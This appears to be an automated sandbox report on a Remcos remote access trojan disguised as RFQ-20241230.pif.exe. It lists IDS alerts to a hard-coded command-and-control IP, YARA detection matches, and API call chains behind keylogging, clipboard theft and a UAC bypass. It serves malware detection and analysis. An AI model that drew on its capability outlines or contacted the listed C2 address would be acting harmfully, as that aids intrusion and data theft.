Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49734 -> 173.211.106.233:2404
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49865 -> 173.211.106.233:2404
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49978 -> 173.211.106.233:2404
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49981 -> 173.211.106.233:2404
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49983 -> 173.211.106.233:2404
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49986 -> 173.211.106.233:2404
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49987 -> 173.211.106.233:2404
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49982 -> 173.211.106.233:2404
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49984 -> 173.211.106.233:2404
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49985 -> 173.211.106.233:2404
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49988 -> 173.211.106.233:2404
Source: Malware configuration extractor; IPs: 173.211.106.233
Source: global traffic; TCP traffic: 192.168.2.9:49734 -> 173.211.106.233:2404
Source: Joe Sandbox View; ASN Name: QUICKPACKETUS QUICKPACKETUS
Source: unknown; TCP traffic detected without corresponding DNS query: 173.211.106.233 (reported 50 times; the C2 address is hard-coded as an IP in the configuration, so there is no DNS lookup to pivot on)
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_00426107 recv
Source: RFQ-20241230.pif.exe; String found in binary or memory: http://geoplugin.net/json.gp (the geolocation lookup endpoint Remcos uses to report the victim's location)
Source: RFQ-20241230.pif.exe, 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, RFQ-20241230.pif.exe, 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, RFQ-20241230.pif.exe, 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://geoplugin.net/json.gp/C
Source: RFQ-20241230.pif.exe, 00000000.00000002.1360288843.0000000003061000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000
  (idHook 0x0D is WH_KEYBOARD_LL, a low-level keyboard hook: the mechanism behind the "register a low level keyboard hook" signature above.)
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
  (listed three times in the original, once under each of the three clipboard signatures: read data, modify data, read clipboard data)
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe; Code function: 5_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR

                E-Banking Fraud

Source: Yara match File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3799626177.0000000001737000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_0041BB87 SystemParametersInfoW 5_2_0041BB87

                System Summary

Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: initial sample Static PE information: Filename: RFQ-20241230.pif.exe
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress 5_2_004158B9
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_095F2F70 0_2_095F2F70
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_095F37E0 0_2_095F37E0
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_095F33A8 0_2_095F33A8
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_095F3C18 0_2_095F3C18
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_01375E6C 0_2_01375E6C
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_01377AA8 0_2_01377AA8
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_05BD61C4 0_2_05BD61C4
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_05BD62F8 0_2_05BD62F8
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_05BDDC48 0_2_05BDDC48
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_05BD4AC0 0_2_05BD4AC0
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_05BDE260 0_2_05BDE260
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_05BDE250 0_2_05BDE250
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_076218BC 0_2_076218BC
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 0_2_07622340 0_2_07622340
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_004520E2 5_2_004520E2
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_0041D081 5_2_0041D081
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_0043D0A8 5_2_0043D0A8
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00437160 5_2_00437160
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_004361BA 5_2_004361BA
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00426264 5_2_00426264
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00431387 5_2_00431387
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_0043652C 5_2_0043652C
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_0041E5EF 5_2_0041E5EF
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_0044C749 5_2_0044C749
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_004367D6 5_2_004367D6
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_004267DB 5_2_004267DB
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_0043C9ED 5_2_0043C9ED
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00432A59 5_2_00432A59
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00436A9D 5_2_00436A9D
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_0043CC1C 5_2_0043CC1C
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00436D58 5_2_00436D58
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00434D32 5_2_00434D32
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_0043CE4B 5_2_0043CE4B
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00440E30 5_2_00440E30
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00426E83 5_2_00426E83
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00412F45 5_2_00412F45
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00452F10 5_2_00452F10
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00426FBD 5_2_00426FBD
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: String function: 00401F66 appears 50 times
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: String function: 004020E7 appears 41 times
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: String function: 004338B5 appears 41 times
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: String function: 00433FC0 appears 55 times
Source: RFQ-20241230.pif.exe Binary or memory string: OriginalFilename vs RFQ-20241230.pif.exe
Source: RFQ-20241230.pif.exe, 00000000.00000002.1366672839.0000000009530000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs RFQ-20241230.pif.exe
Source: RFQ-20241230.pif.exe, 00000000.00000002.1360288843.00000000030B4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs RFQ-20241230.pif.exe
Source: RFQ-20241230.pif.exe, 00000000.00000002.1365241211.00000000075F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs RFQ-20241230.pif.exe
Source: RFQ-20241230.pif.exe, 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs RFQ-20241230.pif.exe
Source: RFQ-20241230.pif.exe, 00000000.00000002.1358434639.000000000138E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs RFQ-20241230.pif.exe
Source: RFQ-20241230.pif.exe Binary or memory string: OriginalFilenameDyIa.exe2 vs RFQ-20241230.pif.exe
Source: RFQ-20241230.pif.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.RFQ-20241230.pif.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 5.2.RFQ-20241230.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.RFQ-20241230.pif.exe.42e7f18.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.RFQ-20241230.pif.exe.422b4f8.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.RFQ-20241230.pif.exe.416ead8.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1362101351.0000000004069000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1362101351.00000000040A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: RFQ-20241230.pif.exe PID: 7696, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: RFQ-20241230.pif.exe PID: 7924, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: RFQ-20241230.pif.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@7/6@0/1
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError 5_2_00416AB7
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle 5_2_0040E219
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource 5_2_0041A64F
Source: C:\Users\user\Desktop\RFQ-20241230.pif.exe Code function: 5_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle 5_2_00419BD4
